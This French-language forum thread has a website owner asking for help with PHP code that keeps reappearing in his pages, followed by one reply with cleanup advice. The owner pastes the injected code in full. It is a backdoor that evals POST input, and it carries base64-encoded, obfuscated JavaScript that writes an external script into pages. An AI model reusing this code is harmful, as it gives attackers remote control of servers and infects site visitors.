Message d'erreur causé par un code virus ajouter automatiquement!!!

Signaler
Messages postés
1
Date d'inscription
vendredi 20 février 2009
Statut
Membre
Dernière intervention
26 mars 2009
-
Messages postés
2083
Date d'inscription
jeudi 16 septembre 2004
Statut
Membre
Dernière intervention
15 octobre 2020
-
bonjour,
g trouvé un code de plus sur mes pages qui a été ajouter automatiquement, meme apres la supression du code il ya tjrs le meme message d'erreur car le code revient à  chaque fois,
voila le code ke g trouvé :
<gras><?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzaXJXY3J0WWlwZUJGdGlyVyUyMFo1bnM2aXJjdFklM0R0WSUyRiUyRjlaNW40WjVuJTJFZUJGMjQ3aXJXJTJFMiUyRWVCRjFaNW45NVFzNSUyRlo1bmppcldxdWVpcldyeWlyVyUyRWppcldzUXM1JTNFNmklM0MlMkZzaXJXY3J0WWl0WXBRczV0JTNFJykucmVwbGFjZSgvdFl8UXM1fHZWNHxlQkZ8aXJXfDZpfFo1bi9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

mnt j'arrive tjrs pas à trouver la solution é mes sites sont tous bloquer!!!
merci de m'envoyer la solution si vous avez rencontrer le meme probleme.

bon courage!!

1 réponse

Messages postés
2083
Date d'inscription
jeudi 16 septembre 2004
Statut
Membre
Dernière intervention
15 octobre 2020
1
Vérifie TOUTES tes pages PHP, et tes bases SQL. Bloque l'accès à ton site pendant que tu le fait en mettant en place un htaccess (même pas de page d'explication, renvoi tout le monde vers le néant ou sur ce sujet par exemple) et en ayant changer tous tes mots de passes (FTP, zone admin, etc)

Si tu ne trouve rien de particulier ou que le travail est trop gigantesque, restaure si possible une sauvegarde.

Vérifie les protections des entrées utilisateurs en échappant les caractères spéciaux, (htmlspecialchars et mysql_real_escape_string).

Tu devrait trouver des infos par là :
http://www.google.fr/search?q=tmp_lkojfghx

A noter que si tu es sur un serveur mutualisé c'est possible que ça ne vienne pas de ton site !

Flachy Joe

« Il vaut mieux mobiliser son intelligence sur des conneries que mobiliser sa connerie sur des choses intelligentes. »
Les Shadoks